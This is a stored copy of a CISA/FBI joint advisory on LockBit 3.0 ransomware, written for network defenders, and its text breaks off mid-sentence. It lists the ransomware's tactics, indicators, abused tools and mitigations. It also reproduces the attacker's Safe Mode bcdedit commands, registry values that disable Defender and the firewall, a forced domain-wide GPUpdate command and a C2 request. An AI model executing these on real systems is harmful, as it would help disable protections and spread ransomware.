{
	"id": "6dd41ce9-10f7-4bb5-b6d6-2872fa3ff142",
	"created_at": "2026-04-06T00:08:24.972924Z",
	"updated_at": "2026-04-10T13:11:28.920617Z",
	"deleted_at": null,
	"sha1_hash": "b06f1fbf73dfbd3ad5175bfc2ec64558b7820384",
	"title": "#StopRansomware: LockBit 3.0 | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 288481,
	"plain_text": "#StopRansomware: LockBit 3.0 | CISA\r\nPublished: 2023-03-16 · Archived: 2026-04-05 18:21:53 UTC\r\n1. Prioritize remediating known exploited vulnerabilities.\r\n2. Train users to recognize and report phishing attempts.\r\n3. Enable and enforce phishing-resistant multifactor authentication.\r\nSUMMARY\r\nNote: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories\r\nfor network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware\r\nadvisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of\r\ncompromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all\r\n#StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.\r\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the\r\nMulti-State Information Sharing \u0026 Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known\r\nLockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.\r\nThe LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a\r\ncontinuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has\r\nfunctioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying\r\nTTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective\r\ncomputer network defense and mitigation challenging.\r\nThe FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations\r\nsection of this CSA to reduce the likelihood and impact of ransomware incidents.\r\nDownload the PDF version of this report: \r\nTECHNICAL DETAILS\r\nNote: This advisory uses the MITRE ATT\u0026CK® for Enterprise framework, version 12. See the MITRE ATT\u0026CK\r\nTactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK for Enterprise\r\n.\r\nCAPABILITIES\r\nLockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares\r\nsimilarities with Blackmatter and Blackcat ransomware.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 1 of 20\n\nLockBit 3.0 is configured upon compilation with many different options that determine the behavior of the\r\nransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be\r\nsupplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional\r\narguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line\r\nparameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless\r\nLockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware.\r\nLockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001\r\n]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in\r\nsuch a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and\r\nunreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the\r\nexecutable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating\r\na unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to\r\ndecrypt or decompress its code, and execute the ransomware.\r\nLockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list.\r\nHowever, whether a system language is checked at runtime is determined by a configuration flag originally set at\r\ncompilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic\r\n(Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001 ], LockBit 3.0 will stop\r\nexecution without infecting the system.\r\nINITIAL ACCESS\r\nAffiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol\r\n(RDP) exploitation [T1133 ], drive-by compromise [T1189 ], phishing campaigns [T1566 ], abuse of valid\r\naccounts [T1078 ], and exploitation of public-facing applications [T1190 ].\r\nEXECUTION AND INFECTION PROCESS\r\nDuring the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required\r\nprivileges [TA0004 ]. LockBit 3.0 performs functions such as:\r\nEnumerating system information such as hostname, host configuration, domain information, local drive\r\nconfiguration, remote shares, and mounted external storage devices [T1082 ]\r\nTerminating processes and services [T1489 ]\r\nLaunching commands [TA0002 ]\r\nEnabling automatic logon for persistence and privilege escalation [T1547 ]\r\nDeleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485 ], [T1490 ]\r\nLockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at\r\ncompilation time or a compromised local account with elevated privileges [T1078 ]. When compiled, LockBit\r\n3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block\r\n(SMB) protocol. LockBit 3.0 attempts to encrypt [T1486 ] data saved to any local or remote device, but skips\r\nfiles associated with core system functions.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 2 of 20\n\nAfter files are encrypted, LockBit 3.0 drops a ransom note with the new filename \u003cRansomware ID\u003e.README.txt\r\nand changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001 ]. If needed, LockBit 3.0 will\r\nsend encrypted host and bot information to a command and control (C2) server [T1027 ].\r\nOnce completed, LockBit 3.0 may delete itself from the disk [T1070.004 ] as well as any Group Policy updates\r\nthat were made, depending on which options were set at compilation time.\r\nEXFILTRATION\r\nLockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010 ];\r\nrclone, an open-source command line cloud storage manager [T1567.002 ]; and publicly available file sharing\r\nservices, such as MEGA [T1567.002 ], to exfiltrate sensitive company data files prior to encryption. While\r\nrclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also\r\nbe used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0\r\naffiliates often use other publicly available file sharing services to exfiltrate data as well [T1567 ] (see Table 1).\r\nTable 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System Encryption\r\nFile Sharing Site\r\nhttps://www.premiumize[.]com\r\nhttps://anonfiles[.]com\r\nhttps://www.sendspace[.]com\r\nhttps://fex[.]net\r\nhttps://transfer[.]sh\r\nhttps://send.exploit[.]in\r\nLEVERAGING FREEWARE AND OPEN-SOURCE TOOLS\r\nLockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These\r\ntools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential\r\ndumping, and file exfiltration. Use of PowerShell and Batch scripts are observed across most intrusions, which\r\nfocus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of\r\nprofessional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2\r\nfor a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware\r\noperations:\r\nTable 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates\r\nTool Description\r\nMITRE\r\nATT\u0026CK ID\r\nChocolatey Command-line package manager for Windows. T1072\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 3 of 20\n\nTool Description\r\nMITRE\r\nATT\u0026CK ID\r\nFileZilla Cross-platform File Transfer Protocol (FTP) application. T1071.002\r\nImpacket\r\nCollection of Python classes for working with network\r\nprotocols.\r\nS0357\r\nMEGA Ltd\r\nMegaSync\r\nCloud-based synchronization tool. T1567.002\r\nMicrosoft\r\nSysinternals\r\nProcDump\r\nGenerates crash dumps. Commonly used to dump the contents\r\nof Local Security Authority Subsystem Service, LSASS.exe.\r\nT1003.001\r\nMicrosoft\r\nSysinternals PsExec\r\nExecute a command-line process on a remote machine. S0029\r\nMimikatz Extracts credentials from system. S0002\r\nNgrok\r\nLegitimate remote-access tool abused to bypass victim network\r\nprotections.\r\nS0508\r\nPuTTY Link (Plink)\r\nCan be used to automate Secure Shell (SSH) actions on\r\nWindows.\r\nT1572\r\nRclone Command-line program to manage cloud storage files S1040\r\nSoftPerfect Network\r\nScanner\r\nPerforms network scans. T1046\r\nSplashtop Remote-desktop software. T1021.001\r\nWinSCP SSH File Transfer Protocol client for Windows. T1048\r\nIndicators of Compromise (IOCs)\r\nThe IOCs and malware characteristics outlined below were derived from field analysis. The following samples are\r\ncurrent as of March 2023.\r\nLockBit 3.0 Black Icon\r\nLockBit 3.0 Wallpaper\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 4 of 20\n\nLockBit Command Line Parameters\r\nLockBit Parameters Description\r\n-del Self-delete.\r\n-gdel Remove LockBit 3.0 group policy changes.\r\n-gspd Spread laterally via group policy.\r\n-pass (32 character value) (Required) Password used to launch LockBit 3.0.\r\n-path (File or path) Only encrypts provided file or folder.\r\n-psex Spread laterally via admin shares.\r\n-safe Reboot host into Safe Mode.\r\n-wall Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note.\r\nMutual Exclusion Object (Mutex) Created\r\nWhen executed, LockBit 3.0 will create the mutex, Global\\\u003cMD4 hash of machine GUID\u003e,\r\nand check to see if this mutex has already been created to avoid running more than one instance of the\r\nransomware.\r\nUAC Bypass via Elevated COM Interface\r\nLockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via\r\nelevated Component Object Model (COM) Interface. C:\\Windows\\System32\\dllhost.exe is spawned with high\r\nintegrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC .\r\nFor example, %SYSTEM32%\\dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7} .\r\nVolume Shadow Copy Deletion\r\nLockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies.\r\nLockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID\r\nto obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 5 of 20\n\nRegistry Artifacts\r\nLockBit 3.0 Icon\r\nRegistry Key Value Data\r\nHKCR\\. \u003cMalware Extension\u003e (Default) \u003cMalware Extension\u003e\r\nHKCR\\\u003cMalware Extension\u003e\\DefaultIcon (Default) C:\\ProgramData\\\u003cMal ware Extension\u003e.ico\r\nLockBit 3.0 Wallpaper\r\nRegistry Key Value Data\r\nHKCU\\Control Panel\\Desktop\\WallPaper (Default) C:\\ProgramData\\\u003cMal ware Extension\u003e.bmp\r\nDisable Privacy Settings Experience\r\nRegistry Key Value Data\r\nSOFTWARE\\Policies\\Microsoft\\Win dows\\OOBE DisablePrivacyE xperience 0\r\nEnable Automatic Logon\r\nRegistry Key Value Data\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon AutoAdminLogon 1\r\n  DefaultUserName \u003cusername\u003e\r\n  DefaultDomainNa me \u003cdomain name\u003e\r\n  DefaultPassword \u003cpassword\u003e\r\nDisable and Clear Windows Event Logs\r\nRegistry Key Value Data\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\r\n\\CurrentVersion\\WINEVT\\Channels \\*\r\nEnabled 0\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\r\n\\CurrentVersion\\WINEVT\\Channels \\*\r\n\\ChannelAccess\r\nChannelAccess\r\nAO:BAG:SYD:(A;;0x1;; ;SY)\r\n(A;;0x5;;;BA)(A;\r\n;0x1;;;LA)\r\nRansom Locations\r\nLockBit 3.0 File Path Locations\r\nADMIN$\\Temp\\\u003cLockBit3.0 Filename\u003e.exe\r\n%SystemRoot%\\Temp\\\u003cLockBit3.0 Filename\u003e.exe\r\n\\\u003cDomain Name\u003e\\sysvol\\\u003cDomain Name\u003e\\scripts\\\u003cLockbit 3.0 Filename\u003e.exe (Domain Controller)\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 6 of 20\n\nSafe Mode Launch Commands\nLockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host\noperating system, the following command is launched to reboot the system to Safe Mode with Networking:\nOperating System Safe Mode with Networking command\nVista and newer bcdedit /set {current} safeboot network\nPre-Vista bootcfg /raw /a /safeboot:network /id 1\nOperating System Disable Safe mode reboot\nVista and newer bcdedit /deletevalue {current} safeboot\nPre-Vista bootcfg /raw /fastdetect /id 1\nGroup Policy Artifacts\nThe following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0\ninfection:\nNetworkShares.xml\n?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\nServices.xml stops and disables services on the Active Directory (AD) hosts.\nServices.xml\n?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\nServices.xml\nname=\"MSSQLFDLauncher\" image=\"4\" changed=\"%s\" uid=\"%s\" userContext=\"0\" removePolicy=\"0\"\ndisabled=\"0\"\u003e\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\nPage 8 of 20\n\nServices.xml\nRegistry.pol\nThe following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and\ndisable Windows Defender.\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\nPage 9 of 20\n\nRegistry Key Registry Value\r\nValue\r\ntype\r\nData\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\\System\r\nGroupPolicyRefresh\r\nTimeDC\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\\System\r\nGroupPolicyRefresh\r\nTimeOffsetDC\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\\System\r\nGroupPolicyRefresh\r\nTime\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\\System\r\nGroupPolicyRefresh\r\nTimeOffset\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\\System EnableSmartScreen\r\nREG_D\r\nWORD\r\n0\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\\System\r\n**del.ShellSmartSc\r\nreenLevel\r\nREG_S\r\nZ\r\n \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\r\nDefender\r\nDisableAntiSpyware\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\r\nDefender\r\nDisableRoutinelyTa\r\nkingAction\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\r\nDefender\\Real-Time Protection\r\nDisableRealtimeMon\r\nitoring\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\r\nDefender\\Real-Time Protection\r\nDisableBehaviorMon\r\nitoring\r\nREG_D\r\nWORD\r\n1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\r\nDefender\\Spynet\r\nSubmitSamplesConse nt\r\nREG_D\r\nWORD\r\n2\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window s\r\nDefender\\Spynet\r\nSpynetReporting\r\nREG_D\r\nWORD\r\n0\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window\r\nsFirewall\\DomainProfile\r\nEnableFirewall\r\nREG_D\r\nWORD\r\n0\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window\r\nsFirewall\\StandardProfile\r\nEnableFirewall\r\nREG_D\r\nWORD\r\n0\r\nForce GPUpdate\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 10 of 20\n\nOnce new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the\r\nnew group policy changes to all computers on the AD domain.\r\nForce GPUpdate Powershell Command\r\npowershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke- GPUpdate -\r\ncomputer $_.name -force -RandomDelayInMinutes 0}\r\nServices Killed\r\nvss sql svc$\r\nmemtas mepocs msexchange\r\nsophos veeam backup\r\nGxVss GxBlr GxFWD\r\nGxCVD GxCIMgr  \r\nProcesses Killed\r\nsql oracle ocssd\r\ndbsnmp synctime agntsvc\r\nisqlplussvc xfssvccon mydesktopservice\r\nocautoupds encsvc firefox\r\ntbirdconfig mydesktopqos ocomm\r\ndbeng50 sqbcoreservice excel\r\ninfopath msaccess mspu\r\nonenote outlook powerpnt\r\nsteam thebat thunderbird\r\nvisio winword wordpad\r\nnotepad    \r\nLockBit 3.0 Ransom Note\r\n~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~\r\n\u003e\u003e\u003e\u003e\u003e Your data is stolen and encrypted.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 11 of 20\n\nIf you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data\r\nappears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time.\r\nThe sooner you pay the ransom, the sooner your company will be safe.\r\nNetwork Connections\r\nIf configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the\r\nvictim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.\r\nExampleofHTTPPOSTrequest\r\nPOST \u003cLockbit C2\u003e/?7F6Da=u5a0TdP0\u0026Aojq=\u0026NtN1W=OuoaovMvrVJSmPNaA5\u0026fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1\r\nAccept:*/*\r\nAccept-Encoding:gzip,deflate,br Content-Type: text/plain\r\nUser-Agent:Safari/537.36\u003cLockbitUserAgentString\u003e\r\nHost:\u003cLockbitC2\u003e\r\nConnection: Keep-Alive LIWy=RJ51lB5GM\u0026a4OuN=\u003cLockbit\r\nID\u003e\u0026LoSyE3=8SZ1hdlhzld4\u0026DHnd99T=rTx9xGlInO6X0zWW\u00262D6=Bokz\u0026T1guL=MtRZsFCRMKyBmfmqI\u0026\r\n6SF3g=JPDt9lfJIQ\u0026wQadZP=\u003cBase64 encrypted\r\ndata\u003eXni=AboZOXwUw\u00262rQnM4=94L\u00260b=ZfKv7c\u0026NO1d=M2kJlyus\u0026AgbDTb=xwSpba\u00268sr=EndL4n0HVZjxPR\u0026\r\nm4ZhTTH=sBVnPY\u0026xZDiygN=cU1pAwKEztU\u0026=5q55aFIAfTVQWTEm\u00264sXwVWcyhy=l68FrIdBESIvfCkvYl\r\nExampleofinformationfoundinencrypteddata\r\n{\r\n\"bot_version\":\"X\",\r\n\"bot_id\":\"X\",\r\n\"bot_company\":\"X\", \"host_hostname\":\"X\", \"host_user\":\"X\",\r\n\"host_os\":\"X\",\r\n\"host_domain\":\"X\",\r\n\"host_arch\":\"X\",\r\n\"host_lang\":\"X\", \"disks_info\":[\r\n{\r\n\"disk_name\":\"X\",\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 12 of 20\n\n\"disk_size\":\"XXXX\", \"free_size\":\"XXXXX\"\r\n}\r\nUser Agent Strings\r\nMozilla/5.0 (Windows NT\r\n6.1)\r\nAppleWebKit/587.38\r\n(KHTML, like Gecko)\r\nChrome/91.0.4472.77\r\nSafari/537.36 Edge/91.0.864.37 Firefox/89.0\r\nGecko/20100101    \r\nMITRE ATT\u0026CK TECHNIQUES\r\nSee Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to\r\nthe MITRE ATT\u0026CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT\u0026CK Mapping\r\nGuide.\r\nInitial Access \r\nTechnique Title  ID  Use \r\nValid Accounts \r\nT1078\r\n \r\nLockBit 3.0 actors obtain and abuse credentials of existing accounts\r\nas a means of gaining initial access. \r\nExploit External Remote\r\nServices \r\nT1133\r\n \r\nLockBit 3.0 actors exploit RDP to gain access to victim networks. \r\nDrive-by Compromise \r\nT1189\r\n \r\nLockBit 3.0 actors gain access to a system through a user visiting a\r\nwebsite over the normal course of browsing. \r\nExploit Public-Facing\r\nApplication \r\nT1190\r\n \r\nLockBit 3.0 actors exploit vulnerabilities in internet-facing systems\r\nto gain access to victims’ systems. \r\nPhishing \r\nT1566\r\n \r\nLockBit 3.0 actors use phishing and spearphishing to gain access to\r\nvictims' networks. \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 13 of 20\n\nExecution \r\nTechnique Title  ID  Use \r\nExecution \r\nTA0002\r\n \r\nLockBit 3.0 launches commands during its execution. \r\nSoftware Deployment\r\nTools \r\nT1072  \r\nLockBit 3.0 uses Chocolatey, a command- line package manager\r\nfor Windows. \r\nPersistence \r\nTechnique Title  ID  Use \r\nValid Accounts \r\nT1078\r\n \r\nLockBit 3.0 uses a compromised user account to maintain\r\npersistence on the target network. \r\nBoot or Logo Autostart\r\nExecution \r\nT1547\r\n \r\nLockBit 3.0 enables automatic logon for persistence. \r\nPrivilege Escalation \r\nTechnique Title  ID  Use \r\nPrivilege Escalation \r\nTA0004\r\n \r\nLockbit 3.0 will attempt to escalate to the required privileges if\r\ncurrent account privileges are insufficient. \r\nBoot or Logo Autostart\r\nExecution \r\nT1547   LockBit 3.0 enables automatic logon for privilege escalation. \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 14 of 20\n\nDefense Evasion \r\nTechnique Title  ID  Use \r\nObfuscated Files or\r\nInformation \r\nT1027  \r\nLockBit 3.0 will send encrypted host and bot information to its\r\nC2 servers. \r\nIndicator Removal: File\r\nDeletion \r\nT1070.004\r\n \r\nLockBit 3.0 will delete itself from the disk. \r\nExecution Guardrails:\r\nEnvironmental Keying \r\nT1480.001\r\n \r\nLockBit 3.0 will only decrypt the main component or continue\r\nto decrypt and/or decompress data if the correct password is\r\nentered. \r\nCredential Access \r\nTechnique Title  ID  Use \r\nOS Credential Dumping:\r\nLSASS Memory \r\nT1003.001\r\n \r\nLockBit 3.0 uses Microsoft Sysinternals ProDump to dump\r\nthe contents of LSASS.exe. \r\nDiscovery \r\nTechnique Title  ID  Use \r\nNetwork Service\r\nDiscovery \r\nT1046  \r\nLockBit 3.0 uses SoftPerfect Network Scanner to scan target\r\nnetworks. \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 15 of 20\n\nDiscovery \r\nTechnique Title  ID  Use \r\nSystem Information\r\nDiscovery \r\nT1082  \r\nLockBit 3.0 will enumerate system information to include\r\nhostname, host configuration, domain information, local drive\r\nconfiguration, remote shares, and mounted external storage\r\ndevices. \r\nSystem Location\r\nDiscovery: System\r\nLanguage Discovery \r\nT1614.001\r\n \r\nLockBit 3.0 will not infect machines with language settings that\r\nmatch a defined exclusion list. \r\nLateral Movement \r\nTechnique Title  ID  Use \r\nRemote Services: Remote\r\nDesktop Protocol \r\nT1021.001\r\n \r\nLockBit 3.0 uses Splashtop remote- desktop software to\r\nfacilitate lateral movement. \r\nCommand and Control \r\nTechnique Title  ID  Use \r\nApplication Layer Protocol: File\r\nTransfer Protocols \r\nT1071.002\r\n \r\nLockBit 3.0 uses FileZilla for C2. \r\nProtocol Tunnel  T1572  \r\nLockBit 3.0 uses Plink to automate SSH actions\r\non Windows. \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 16 of 20\n\nExfiltration \r\nTechnique Title  ID  Use \r\nExfiltration  TA0010  \r\nLockBit 3.0 uses Stealbit, a custom exfiltration tool first used\r\nwith LockBit 2.0, to steal data from a target network. \r\nExfiltration Over Web\r\nService \r\nT1567  \r\nLockBit 3.0 uses publicly available file sharing services to\r\nexfiltrate a target’s data. \r\nExfiltration Over Web\r\nService: Exfiltration to\r\nCloud Storage \r\nT1567.002\r\n \r\nLockBit 3.0 actors use (1) rclone, an open source command\r\nline cloud storage manager to exfiltrate and (2) MEGA, a\r\npublicly available file sharing service for data exfiltration. \r\nImpact \r\nTechnique Title  ID  Use \r\nData Destruction  T1485   LockBit 3.0 deletes log files and empties the recycle bin. \r\nData Encrypted for\r\nImpact \r\nT1486  \r\nLockBit 3.0 encrypts data on target systems to interrupt\r\navailability to system and network resources. \r\nService Stop  T1489   LockBit 3.0 terminates processes and services. \r\nInhibit System\r\nRecovery \r\nT1490   LockBit 3.0 deletes volume shadow copies residing on disk. \r\nDefacement: Internal\r\nDefacement \r\nT1491.001\r\n \r\nLockBit 3.0 changes the host system’s wallpaper and icons to the\r\nLockBit 3.0 wallpaper and icons, respectively. \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 17 of 20\n\nMITIGATIONS\r\nThe FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your\r\norganization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and\r\nTechnology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST\r\nrecommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks\r\nand guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity\r\nPerformance Goals for more information on the CPGs, including additional recommended baseline protections.\r\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and\r\nservers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device,\r\nthe cloud).\r\nRequire all accounts with password logins (e.g., service account, admin accounts, and domain admin\r\naccounts) to comply with National Institute for Standards and Technology (NIST) standards for developing\r\nand managing password policies [CPG 3.4].\r\nUse longer passwords consisting of at least 8 characters and no more than 64 characters in length\r\n[CPG 1.4]\r\nStore passwords in hashed format using industry-recognized password managers\r\nAdd password user “salts” to shared login credentials\r\nAvoid reusing passwords\r\nImplement multiple failed login attempt account lockouts [CPG 1.1]\r\nDisable password “hints”\r\nRefrain from requiring password changes more frequently than once per year. Note: NIST guidance\r\nsuggests favoring longer passwords instead of requiring regular and frequent password resets.\r\nFrequent password resets are more likely to result in users developing password “patterns” cyber\r\ncriminals can easily decipher.\r\nRequire administrator credentials to install software\r\nRequire phishing-resistant multifactor authentication [CPG 1.3] for all services to the extent possible,\r\nparticularly for webmail, virtual private networks, and accounts that access critical systems.\r\nKeep all operating systems, software, and firmware up to date. Timely patching is one of the most\r\nefficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\r\nSegment networks [CPG 8.1] to prevent the spread of ransomware. Network segmentation can help\r\nprevent the spread of ransomware by controlling traffic flows between—and access to—various\r\nsubnetworks and by restricting adversary lateral movement.\r\nIdentify, detect, and investigate abnormal activity and potential traversal of the indicated\r\nransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool\r\nthat logs and reports all network traffic, including lateral movement activity on a network [CPG 5.1].\r\nEndpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as\r\nthey have insight into common and uncommon network connections for each host.\r\nInstall, regularly update, and enable real time detection for antivirus software on all hosts.\r\nReview domain controllers, servers, workstations, and active directories for new and/or unrecognized\r\naccounts.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 18 of 20\n\nAudit user accounts with administrative privileges and configure access controls according to the\r\nprinciple of least privilege [CPG 1.5].\r\nDisable unused ports.\r\nConsider adding an email banner to emails [CPG 8.3] received from outside your organization.\r\nDisable hyperlinks in received emails.\r\nImplement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the\r\nprinciple of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy\r\nis set in place to automatically disable admin accounts at the Active Directory level when the account is not\r\nin direct need. Individual users may submit their requests through an automated process that grants them\r\naccess to a specified system for a set timeframe when they need to support the completion of a certain task.\r\nDisable command-line and scripting activities and permissions. Privilege escalation and lateral\r\nmovement often depend on software utilities running from the command line. If threat actors are not able\r\nto run these tools, they will have difficulty escalating privileges and/or moving laterally.\r\nMaintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By\r\ninstituting this practice, the organization ensures they will not be severely interrupted, and/or only have\r\nirretrievable data.\r\nEnsure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire\r\norganization’s data infrastructure [CPG 3.3].\r\nVALIDATE SECURITY CONTROLS\r\nIn addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and\r\nvalidating your organization's security program against the threat behaviors mapped to the MITRE ATT\u0026CK for\r\nEnterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing\r\nyour existing security controls inventory to assess how they perform against the ATT\u0026CK techniques described in\r\nthis advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see Table 3).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. Tune your security program, including people, processes, and technologies, based on the data generated by\r\nthis process.\r\nThe FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a\r\nproduction environment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in this\r\nadvisory.\r\nRESOURCES\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 19 of 20\n\nStopransomware.gov is a whole-of-government approach that gives one central location for ransomware\r\nresources and alerts.\r\nResource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center\r\n(MS-ISAC) Joint Ransomware Guide.\r\nNo-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment .\r\nREPORTING\r\nThe FBI is seeking any information that can be legally shared, including:\r\nBoundary logs showing communication to and from foreign IP addresses\r\nSample ransom note\r\nCommunications with LockBit 3.0 